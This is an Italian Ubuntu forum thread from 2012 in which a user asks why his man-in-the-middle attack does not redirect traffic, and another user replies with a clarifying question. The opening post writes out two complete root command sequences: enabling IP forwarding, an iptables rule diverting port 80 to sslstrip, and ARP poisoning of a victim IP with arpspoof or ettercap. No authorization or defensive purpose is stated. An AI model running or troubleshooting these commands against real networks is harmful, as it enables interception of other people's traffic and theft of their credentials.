Notizia:
  • Rilasciata Ubuntu 14.04 LTS Trusty Tahr. Per ottenerla, visitate questa pagina oppure visualizzate la dimostrazione.
  • È uscito il numero 15 della Newsletter italiana di Ubuntu. Lo trovate a questo indirizzo.
  • È uscito il numero 79 di Full Circle Magazine in italiano. Lo trovate a questo indirizzo.

Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Sicurezza del sistema: firewall, antispam, antivirus, ssh, patch, bug, ecc.

Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Messaggioda Evicaro » giovedì 12 aprile 2012, 17:36

Ciao a tutti,

ho un bisogno disperato (per la mia sanità mentale, dato che sto impazzendo dietro questo problema da stamattina) di riuscire a capire perchè se faccio un MITM qualsiasi, il traffico non viene rediretto.

Non riesco ne con ettercap (testuale), ne con arpspoof.

Il mitm funziona perchè se vado sul pc vittima a controllare l'arp è effettivamente avvelenata... peccato che abbia causato un bel DOS più che un MITM...

Sslstrip funziona perchè se sul browser del mio pc metto come proxy localhost con la porta di sslstrip (uso la 1000) cattura il traffico senza problemi...

Questa è la procedura con arpspoof, tutto da root ovviamente:

Codice: Seleziona tutto

echo "1" > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward (giusto per controllare)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000

sslstrip -l -k 1000

arpspoof -i wlan0 -t IP_VITTIMA IP_GATEWAY


Questa è la procedura con Ettercap, sempre da root:

Codice: Seleziona tutto

echo "1" > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward (sempre per controllare)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000

sslstrip -l -k 1000

ettercap -i wlan0 -Tq -M ARP:remote /IP_VITTIMA/ //


Ho googlato per due giorni prima di aprire un thread, ma non riesco a capire il perchè... vi prego aiutatemi!!!

EDIT: mi era scappato un sudo di troppo... ma in realtà tutti i comandi sono lanciati tutti da root, quindi poco importa...
Ultima modifica di Evicaro il giovedì 12 aprile 2012, 19:20, modificato 1 volta in totale.
Evicaro Non specificato
Prode Principiante
 
Messaggi: 15
Iscrizione: ottobre 2010
Località: Torino

Re: Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Messaggioda Jambaz » giovedì 12 aprile 2012, 18:54

ma poi dopo aver fatto iptables come lanci le due procedure ?
Jambaz Non specificato
Prode Principiante
 
Messaggi: 51
Iscrizione: novembre 2011

Re: Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Messaggioda Evicaro » giovedì 12 aprile 2012, 19:18

Jambaz ha scritto:ma poi dopo aver fatto iptables come lanci le due procedure ?


Non so se ho capito bene la domanda... ma ad ogni modo apro due terminali nuovi da root e li lancio... cambia solo l'ultimo comando in base a se voglio fare arp poisoning con arpspoof o con ettercap... (e preferisco ettercap perchè arpspoof non rearpa le vittime ad attacco ultimato)...
Evicaro Non specificato
Prode Principiante
 
Messaggi: 15
Iscrizione: ottobre 2010
Località: Torino


Torna a Sicurezza

Chi c’è in linea

Visualizzano questa sezione: 0 utenti registrati e 1 ospite